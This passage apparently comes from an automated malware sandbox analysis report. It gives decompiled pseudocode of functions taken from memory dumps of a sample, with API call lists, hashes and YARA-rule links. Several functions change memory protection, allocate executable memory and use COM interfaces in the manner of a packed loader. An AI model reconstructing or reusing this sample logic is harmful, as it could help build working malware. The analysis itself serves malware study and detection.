				_t31 = VirtualProtect(_a4,  *(__eax + 0x54), 4,  &_v16); // executed
				_v8 = _v8 & 0x00000000;
				if(_t42 <= 0) {
					L11:
					return _v12;
				}
				_t51 = _t50 + 0x24;
				while(1) {
					_t54 = _v12;
					if(_t54 != 0) {
						goto L11;
					}
					asm("bt dword [esi], 0x1d");
					if(_t54 >= 0) {
						asm("bt dword [esi], 0x1e");
						if(__eflags >= 0) {
							_t33 = 4;
						} else {
							asm("bt dword [esi], 0x1f");
							_t35 = 0;
							_t33 = (_t35 & 0xffffff00 | __eflags > 0x00000000) + (_t35 & 0xffffff00 | __eflags > 0x00000000) + 2;
						}
					} else {
						asm("bt dword [esi], 0x1f");
						asm("sbb eax, eax");
						_t33 = ( ~((_t31 & 0xffffff00 | _t54 > 0x00000000) & 0x000000ff) & 0x00000020) + 0x20;
					}
					_t34 = VirtualProtect( *((intOrPtr*)(_t51 - 0x18)) + _a4,  *(_t51 - 0x1c), _t33,  &_v16); // executed
					if(_t34 == 0) {
						_v12 = GetLastError();
					}
					_t51 = _t51 + 0x28;
					_v8 = _v8 + 1;
					_t31 = _v8;
					if(_t31 < _v20) {
						continue;
					} else {
						goto L11;
					}
				}
				goto L11;
			}

0x01511ebe
0x01511ec3
0x01511ecf
0x01511edc
0x01511ee2
0x01511ee4
0x01511eea
0x01511f57
0x01511f5e
0x01511f5e
0x01511eec
0x01511eef
0x01511eef
0x01511ef3
0x00000000
0x00000000
0x01511ef5
0x01511ef9
0x01511f11
0x01511f15
0x01511f29
0x01511f17
0x01511f17
0x01511f1d
0x01511f21
0x01511f21
0x01511efb
0x01511efb
0x01511f07
0x01511f0c
0x01511f0c
0x01511f3a
0x01511f3e
0x01511f46
0x01511f46
0x01511f49
0x01511f4c
0x01511f4f
0x01511f55
0x00000000
0x00000000
0x00000000
0x00000000
0x01511f55
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,00000004,?,?,?,00000000,?,?), ref: 01511EE2
VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 01511F3A
GetLastError.KERNEL32 ref: 01511F40

Memory Dump Source

Source File: 00000000.00000002.457064738.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true

Associated: 00000000.00000002.457074162.0000000001515000.00000040.00000001.sdmp Download File
Associated: 00000000.00000002.457082559.0000000001517000.00000040.00000001.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: 05002f632d5f225775aebfcbb96c71af4781db7ae6a3e3b295de19b46dedf322
Instruction ID: b95787f50ea1147a2b14ed167454fdfa554a12ee63ff5787e56820b6a53bc3a3
Opcode Fuzzy Hash: 05002f632d5f225775aebfcbb96c71af4781db7ae6a3e3b295de19b46dedf322
Instruction Fuzzy Hash: 4E21AE72900209EFEB218FA8C8C0EADB7F4FF14324F140599E6509B146E374DA88CB60

Uniqueness

Uniqueness Score: -1.00%

Function 015116E4, Relevance: 4.6, APIs: 3, Instructions: 62
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E015116E4() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				intOrPtr _t30;
				void* _t32;
				signed int _t35;
				intOrPtr* _t37;
				intOrPtr _t39;
				int _t44;

				_t15 =  *0x1514144;
				if( *0x151412c > 5) {
					_t16 = _t15 + 0x15150f4;
				} else {
					_t16 = _t15 + 0x15150b1;
				}
				E01511000(_t16, _t16);
				_t35 = 6;
				memset( &_v32, 0, _t35 << 2);
				if(E01511D86( &_v32,  &_v16,  *0x1514140 ^ 0xc786104c) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x1514138);
					_t8 = _t26 + 2; // 0x2
					_t44 = _t26 + _t8;
					_t11 = _t44 + 8; // 0xa
					_t30 = E015110FC(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t37 = _v36;
						 *_t37 = _t30;
						_t32 =  *0x1514138;
						if(_t32 == 0) {
							 *(_t37 + 4) = 0;
						} else {
							memcpy(_t37 + 4, _t32, _t44);
						}
					}
					_t25 = E01511ADC(_v28); // executed
				}
				ExitThread(_t25);
			}

0x015116ea
0x015116fb
0x01511705
0x015116fd
0x015116fd
0x015116fd
0x0151170c
0x01511715
0x0151171a
0x01511738
0x01511793
0x0151173a
0x01511740
0x01511746
0x01511746
0x01511754
0x01511758
0x0151175f
0x01511761
0x01511765
0x01511767
0x0151176e
0x01511782
0x01511770
0x01511776
0x0151177b
0x0151176e
0x0151178a
0x0151178a
0x01511795

APIs

lstrlenW.KERNEL32(?,?,?,?), ref: 01511740
memcpy.NTDLL(?,?,00000002), ref: 01511776
ExitThread.KERNEL32 ref: 01511795

Memory Dump Source

Source File: 00000000.00000002.457064738.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true

Associated: 00000000.00000002.457074162.0000000001515000.00000040.00000001.sdmp Download File
Associated: 00000000.00000002.457082559.0000000001517000.00000040.00000001.sdmp Download File

Similarity

API ID: ExitThreadlstrlenmemcpy
String ID:
API String ID: 3726537860-0
Opcode ID: 17e529f76383ca0d8cb4c9da6068ae3cabf21452f615e89d4b43027e68cef01d
Instruction ID: 8ab36dfea1933fbbc797adce58788a2d6280e9b45f9c814f1a27b7d281afe6e5
Opcode Fuzzy Hash: 17e529f76383ca0d8cb4c9da6068ae3cabf21452f615e89d4b43027e68cef01d
Instruction Fuzzy Hash: 1C11EE71604A06ABE723DB74CCC8E9B77ECBB45350F060869F615DF248EB20E5088B91

Uniqueness

Uniqueness Score: -1.00%

Function 02F663A0, Relevance: 4.6, APIs: 3, Instructions: 53COMMON

Download Yara Rule

APIs

SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 02F663C7
memcpy.NTDLL(?,?,?,?,?,?,02F6A6F4,80000002), ref: 02F663E4

Part of subcall function 02F6642C: SysFreeString.OLEAUT32(?), ref: 02F6650B

SafeArrayDestroy.OLEAUT32(?), ref: 02F66419

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: ArraySafe$CreateDestroyFreeStringmemcpy
String ID:
API String ID: 4076844959-0
Opcode ID: 411617170a661c75284c352f1c68b9291ca0071429819ce7ddb817fd40022966
Instruction ID: bb2ae62bb785d0c22a78a5e3257d53967a8e8d3adb4faf3b52f8e59248bdb54d
Opcode Fuzzy Hash: 411617170a661c75284c352f1c68b9291ca0071429819ce7ddb817fd40022966
Instruction Fuzzy Hash: E9115172900109BFDB019FA4DD09EEEBBB9EF08394F008015EA04E7161E6759A14CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02F67827, Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E02F67827(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t14;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t14 = E02F6135B(_a4, _t26, __edi); // executed
				_t28 = _t14;
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0x2f6d2a4; // 0xb3a5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0x2f6e4e8; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0x2f6e8ec; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E02F6684E();
					_push( &_v64);
					if( *0x2f6d0e4() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E02F6684E();
				}
				return _t28;
			}

0x02f67827
0x02f6782e
0x02f67837
0x02f6783c
0x02f67840
0x02f6784a
0x02f6784f
0x02f67854
0x02f67859
0x02f67863
0x02f6786d
0x02f6786d
0x02f67865
0x02f67865
0x02f67865
0x02f67865
0x02f67873
0x02f67879
0x02f6787a
0x02f6787d
0x02f67880
0x02f67883
0x02f6788b
0x02f67894
0x02f6789c
0x02f6789c
0x02f6789e
0x02f678a0
0x02f678a0
0x02f678aa

APIs

Part of subcall function 02F6135B: SysAllocString.OLEAUT32(00000000), ref: 02F613B5
Part of subcall function 02F6135B: SysAllocString.OLEAUT32(0070006F), ref: 02F613C9
Part of subcall function 02F6135B: SysAllocString.OLEAUT32(00000000), ref: 02F613DB

memset.NTDLL ref: 02F6784A
GetLastError.KERNEL32 ref: 02F67896

Strings

<, xrefs: 02F67859

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocString$ErrorLastmemset
String ID: <
API String ID: 3736384471-4251816714
Opcode ID: 3a391469fa2e14e4885ee1772c8ee77a281eb5eb8dcd1124a4a84768464eb087
Instruction ID: b24d0d4274eada94a0d071d5720788941c1ba3b484bd24961edc2fef7ed07f22
Opcode Fuzzy Hash: 3a391469fa2e14e4885ee1772c8ee77a281eb5eb8dcd1124a4a84768464eb087
Instruction Fuzzy Hash: 78011E31D00218ABDB10EFB4D88CEEEBBA8EF08B84F144026FA04E7200D730D914CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F67A28, Relevance: 3.8, APIs: 3, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02F67A28(void* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* __ebx;
				void* _t24;
				intOrPtr _t27;
				signed int _t38;
				signed char* _t46;
				void* _t51;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_t51 = __edx;
				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x90;
				_v12 = 0x90;
				_t24 = E02F658BE(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0x2f6d2d0, 0x90);
					_t27 =  *0x2f6d2d4; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						E02F66E92(_t46, _a4, 0x90, _t27, 0);
					}
					if(E02F679F5( &_v36) != 0 && E02F6A3DA(0x90, _a4,  &_v20,  &_v12,  &_v36, 0) == 0) {
						_t55 = _v20;
						_v36 =  *_t46;
						_t38 = E02F64B44(_a8,  &_v36, _t51, _t46, _a12, _t55); // executed
						_v16 = _t38;
						 *(_t55 + 4) = _v36;
						memset(_t55, 0, _v12 - (_t46[4] & 0xf));
						_t57 = _t57 + 0xc;
						E02F6147E(_t55);
					}
					memset(_a4, 0, _t53);
					E02F6147E(_a4);
				}
				return _v16;
			}

0x02f67a28
0x02f67a2e
0x02f67a33
0x02f67a40
0x02f67a43
0x02f67a46
0x02f67a4b
0x02f67a50
0x02f67a5e
0x02f67a63
0x02f67a68
0x02f67a6d
0x02f67a78
0x02f67a78
0x02f67a87
0x02f67aa5
0x02f67aae
0x02f67ab5
0x02f67abd
0x02f67ac3
0x02f67ad3
0x02f67ad8
0x02f67adc
0x02f67adc
0x02f67ae7
0x02f67af2
0x02f67af2
0x02f67afe

APIs

Part of subcall function 02F658BE: RtlAllocateHeap.NTDLL(00000000,-00000008,02F61C51), ref: 02F658CA

memcpy.NTDLL(00000000,00000090,?,?,?,00000008), ref: 02F67A5E
memset.NTDLL ref: 02F67AD3
memset.NTDLL ref: 02F67AE7

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: memset$AllocateHeapmemcpy
String ID:
API String ID: 1529149438-0
Opcode ID: 2c2595f53a366cb37ae5de03be8745635afa506c2b5e3220a896c5245bd92ef6
Instruction ID: cfa9e29960234a36fef92b3b52df09530f6c93b6a2602fbfdd71beff1ccd2b8e
Opcode Fuzzy Hash: 2c2595f53a366cb37ae5de03be8745635afa506c2b5e3220a896c5245bd92ef6
Instruction Fuzzy Hash: FE210C75E00218ABDF11EBA5CC49FEEBBB9EF09784F044055FA14E6251D735D614CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F61EEA, Relevance: 3.1, APIs: 2, Instructions: 149
serviceCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E02F61EEA(intOrPtr _a4) {
				void* _v12;
				char _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				void* _v46;
				short _v48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr* _t53;
				intOrPtr _t56;
				void* _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				short _t73;
				intOrPtr* _t74;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t82;
				char* _t98;
				intOrPtr _t100;
				void* _t106;
				void* _t108;
				intOrPtr _t112;

				_v48 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t49 =  *0x2f6d2a4; // 0xb3a5a8
				_t4 = _t49 + 0x2f6e450; // 0x3aa89f8
				_t82 = 0;
				_t5 = _t49 + 0x2f6e440; // 0x9ba05972
				_t51 =  *0x2f6d15c(_t5, 0, 4, _t4,  &_v20); // executed
				_t106 = _t51;
				if(_t106 >= 0) {
					_t53 = _v20;
					_push( &_v12);
					_push(1);
					_push( &_v32);
					_push(8);
					_t98 =  &_v48;
					_push(_t98);
					_push(_t98);
					_push(_t53); // executed
					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
						_t56 =  *0x2f6d2a4; // 0xb3a5a8
						_t30 = _t56 + 0x2f6e430; // 0x3aa89d8
						_t31 = _t56 + 0x2f6e460; // 0x4c96be40
						_t58 =  *0x2f6d0f8(_v12, _t31, _t30,  &_v24); // executed
						_t106 = _t58;
						_t59 = _v12;
						 *((intOrPtr*)( *_t59 + 8))(_t59);
						goto L11;
					} else {
						_t71 = _v20;
						_v16 = 0;
						_t106 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
						if(_t106 >= 0) {
							_t112 = _v16;
							if(_t112 == 0) {
								_t106 = 0x80004005;
								goto L11;
							} else {
								if(_t112 <= 0) {
									L11:
									if(_t106 >= 0) {
										goto L12;
									}
								} else {
									do {
										_t73 = 3;
										_v48 = _t73;
										_t74 = _v20;
										_v40 = _t82;
										_t108 = _t108 - 0x10;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t106 =  *((intOrPtr*)( *_t74 + 0x20))(_t74,  &_v12);
										if(_t106 < 0) {
											goto L7;
										} else {
											_t77 =  *0x2f6d2a4; // 0xb3a5a8
											_t23 = _t77 + 0x2f6e430; // 0x3aa89d8
											_t24 = _t77 + 0x2f6e460; // 0x4c96be40
											_t106 =  *0x2f6d0f8(_v12, _t24, _t23,  &_v24);
											_t80 = _v12;
											 *((intOrPtr*)( *_t80 + 8))(_t80);
											if(_t106 >= 0) {
												L12:
												_t63 = _v24;
												_t106 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
												if(_t106 >= 0) {
													_t100 =  *0x2f6d2a4; // 0xb3a5a8
													_t67 = _v28;
													_t40 = _t100 + 0x2f6e420; // 0x214e3
													_t106 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
													_t69 = _v28;
													 *((intOrPtr*)( *_t69 + 8))(_t69);
												}
												_t65 = _v24;
												 *((intOrPtr*)( *_t65 + 8))(_t65);
											} else {
												goto L7;
											}
										}
										goto L15;
										L7:
										_t82 = _t82 + 1;
									} while (_t82 < _v16);
									goto L11;
								}
							}
						}
					}
					L15:
					_t61 = _v20;
					 *((intOrPtr*)( *_t61 + 8))(_t61);
				}
				return _t106;
			}

0x02f61ef5
0x02f61efc
0x02f61efd
0x02f61efe
0x02f61eff
0x02f61f05
0x02f61f0a
0x02f61f13
0x02f61f16
0x02f61f1d
0x02f61f23
0x02f61f27
0x02f61f2d
0x02f61f35
0x02f61f36
0x02f61f3b
0x02f61f3c
0x02f61f3e
0x02f61f41
0x02f61f42
0x02f61f43
0x02f61f49
0x02f61fdf
0x02f61fe4
0x02f61feb
0x02f61ff5
0x02f61ffb
0x02f61ffd
0x02f62003
0x00000000
0x02f61f4f
0x02f61f4f
0x02f61f56
0x02f61f5f
0x02f61f63
0x02f61f69
0x02f61f6c
0x02f61fd4
0x00000000
0x02f61f6e
0x02f61f6e
0x02f62006
0x02f62008
0x00000000
0x00000000
0x02f61f74
0x02f61f74
0x02f61f76
0x02f61f7b
0x02f61f7f
0x02f61f82
0x02f61f87
0x02f61f8f
0x02f61f90
0x02f61f91
0x02f61f93
0x02f61f97
0x02f61f9b
0x00000000
0x02f61f9d
0x02f61fa1
0x02f61fa6
0x02f61fad
0x02f61fbd
0x02f61fbf
0x02f61fc5
0x02f61fca
0x02f6200a
0x02f6200a
0x02f62017
0x02f6201b
0x02f62020
0x02f62026
0x02f6202b
0x02f62035
0x02f62037
0x02f6203d
0x02f6203d
0x02f62040
0x02f62046
0x00000000
0x00000000
0x00000000
0x02f61fca
0x00000000
0x02f61fcc
0x02f61fcc
0x02f61fcd
0x00000000
0x02f61fd2
0x02f61f6e
0x02f61f6c
0x02f61f63
0x02f62049
0x02f62049
0x02f6204f
0x02f6204f
0x02f62058

APIs

IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,03AA89D8,02F61389,?,?,?,?,?,?,?,?,?,?,?,02F61389), ref: 02F61FB7
IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,03AA89D8,02F61389,?,?,?,?,?,?,?,02F61389,00000000,00000000,00000000,006D0063), ref: 02F61FF5

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: QueryServiceUnknown_
String ID:
API String ID: 2042360610-0
Opcode ID: 6c6c76bc0ce55964bd2a6842e5243b40043285d17a02f6d19798d10cb25260fa
Instruction ID: d201af89f36f05d908461ce7e8548734b32b6a622be6419d23a3a239aa1cda9c
Opcode Fuzzy Hash: 6c6c76bc0ce55964bd2a6842e5243b40043285d17a02f6d19798d10cb25260fa
Instruction Fuzzy Hash: 45513F76E00119AFCB00DFA4C88CDAEB7B9FF4C744B058959EA15EB210D731AD45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F6642C, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E02F6642C(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E02F64FFA(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x2f6d2a4; // 0xb3a5a8
						_t20 = _t68 + 0x2f6e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E02F65103(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x02f66432
0x02f66435
0x02f66445
0x02f6644e
0x02f66452
0x02f66520
0x02f66526
0x02f66526
0x02f6646c
0x02f66471
0x02f66475
0x02f6647b
0x02f66480
0x02f66487
0x02f66496
0x02f66496
0x02f6649a
0x02f6649c
0x02f664a8
0x02f664b3
0x02f664be
0x02f664c2
0x02f664cc
0x02f664d0
0x02f664d2
0x02f664d7
0x02f664de
0x02f664ee
0x02f664ee
0x02f664d7
0x02f664d0
0x02f664f0
0x02f664f5
0x02f664fa
0x02f664fa
0x02f664fd
0x02f66506
0x02f6650b
0x02f6650b
0x02f66510
0x02f66515
0x02f66515
0x02f66510
0x02f6649a
0x02f66517
0x02f6651d
0x00000000

APIs

Part of subcall function 02F64FFA: SysAllocString.OLEAUT32(80000002), ref: 02F65057
Part of subcall function 02F64FFA: SysFreeString.OLEAUT32(00000000), ref: 02F650BD

SysFreeString.OLEAUT32(?), ref: 02F6650B
SysFreeString.OLEAUT32(02F6A6F4), ref: 02F66515

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 3bd28a57787f556cbe3fc4d85ea892d6ddaf09a341511ac970a7c8a827acec4e
Instruction ID: 24d54983470ba7e190b49bd7f508314f37c46321398251687429bafa0bc8eb5e
Opcode Fuzzy Hash: 3bd28a57787f556cbe3fc4d85ea892d6ddaf09a341511ac970a7c8a827acec4e
Instruction Fuzzy Hash: 00315972900159AFCB21DF68CC88CABBB7AEBC97847144658FA15DB214E335ED51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F6A555, Relevance: 3.1, APIs: 2, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E02F6A555(intOrPtr* __eax, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr* _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr* _t32;
				intOrPtr _t42;
				intOrPtr _t45;
				intOrPtr _t48;
				void* _t51;

				_push( &_v16);
				_t42 =  *0x2f6d2a4; // 0xb3a5a8
				_t2 = _t42 + 0x2f6e470; // 0x20400
				_push(0);
				_push(__eax);
				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
				if(_t51 >= 0) {
					_t22 = _v16;
					_t45 =  *0x2f6d2a4; // 0xb3a5a8
					_t6 = _t45 + 0x2f6e490; // 0xe7a1af80
					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
					_t51 = _t23;
					if(_t51 >= 0) {
						_t26 = _v12;
						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
						if(_t51 >= 0) {
							_t48 =  *0x2f6d2a4; // 0xb3a5a8
							_t30 = _v8;
							_t12 = _t48 + 0x2f6e480; // 0xa4c6892c
							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
							_t51 = _t31;
							_t32 = _v8;
							 *((intOrPtr*)( *_t32 + 8))(_t32);
						}
						_t28 = _v12;
						 *((intOrPtr*)( *_t28 + 8))(_t28);
					}
					_t24 = _v16;
					 *((intOrPtr*)( *_t24 + 8))(_t24);
				}
				return _t51;
			}

0x02f6a561
0x02f6a562
0x02f6a568
0x02f6a56f
0x02f6a571
0x02f6a575
0x02f6a579
0x02f6a57b
0x02f6a584
0x02f6a58a
0x02f6a592
0x02f6a594
0x02f6a598
0x02f6a59a
0x02f6a5a7
0x02f6a5ab
0x02f6a5b0
0x02f6a5b6
0x02f6a5bb
0x02f6a5c3
0x02f6a5c5
0x02f6a5c7
0x02f6a5cd
0x02f6a5cd
0x02f6a5d0
0x02f6a5d6
0x02f6a5d6
0x02f6a5d9
0x02f6a5df
0x02f6a5df
0x02f6a5e6

APIs

IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 02F6A592
IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 02F6A5C3

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: Interface_ProxyQueryUnknown_
String ID:
API String ID: 2522245112-0
Opcode ID: 86e6ca43d80b3f891b05a190a0e33d880ccc459b2b07f4c6ec2ae0b5a36cbaa3
Instruction ID: 13bda576356ce034a1c620dc87a876bc2085ceeade47396acdca0a824e6fa488
Opcode Fuzzy Hash: 86e6ca43d80b3f891b05a190a0e33d880ccc459b2b07f4c6ec2ae0b5a36cbaa3
Instruction Fuzzy Hash: B8210079A0061AEFCB00DBA4C848D5AB779FF88744B148A88E905EB315DA31ED01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0122B1B0, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0122B234

Strings

VirtualAlloc, xrefs: 0122B219, 0122B21C

Memory Dump Source

Source File: 00000000.00000002.456939571.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: false

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: 28e58905486cc54ceb0c66d9f59e735f8340f5baddf7968a63ebffb8cdc22c52
Instruction ID: 775ef30c101ca51e3e01f71df1b8cd5f117ba4c0504f5627b08cce5efd56fef7
Opcode Fuzzy Hash: 28e58905486cc54ceb0c66d9f59e735f8340f5baddf7968a63ebffb8cdc22c52
Instruction Fuzzy Hash: 14111260D082CEEEEF01D7E89409BFFBFB55F21704F044198D5446B282D6BA575887B6

Uniqueness

Uniqueness Score: -1.00%

Function 02F66C68, Relevance: 3.0, APIs: 2, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(02F69642), ref: 02F66C81

Part of subcall function 02F6642C: SysFreeString.OLEAUT32(?), ref: 02F6650B

SysFreeString.OLEAUT32(00000000), ref: 02F66CC2

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: cc8d620181a067ec0a89f63fc63a215bd1f0c578ab28276519366d5079d2847d
Instruction ID: 23075b037c34351f98b0108118ccf4bd7d07295337b6a434791a667d93222010
